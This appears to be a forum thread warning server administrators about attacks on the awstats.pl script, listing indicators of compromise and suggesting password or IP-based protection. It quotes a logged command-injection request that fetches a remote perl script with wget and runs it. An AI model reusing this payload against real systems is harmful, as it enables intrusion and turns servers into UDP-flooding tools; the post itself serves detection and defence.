Beware of attacks against awstats.pl
1) Entries in your apache access logs with the following form: GET /awstats/awstats.pl?configdir
=|echo%20;cd%20/var/tmp;killall%20-9%20perl;wget%20http://alekso.mine.nu/a1.txt;
perl%20a1.txt|
2) The presense of running processes named 'udp.pl, egx, or f3', or the presense of these files on the filesystem (most likely in /var/tmp).
3) Lots of UDP traffic directed against random hosts (the processes use a random number generator using /dev/urandom to generate targets).
Fix: Remove, disable, or password protect awstats.pl. Unknown if there is a fix available.
John
6 Replies
Michael
John
@tierra:
Just as a tip, it's generally not a bad idea to keep awstats (and other scripts like awstats) protected behind some password authentication using htpasswd or equivalent.
I keep a lot of things like this (webalizer, server-status, munin) protected by .htaccess files that only allow access from my own IP (and the proxy server at work).
Order deny,allow
Deny from all
Allow from 192.168.1.0/24
Allow from 111.222.333.0/24
Allow from 127.0.0.0/8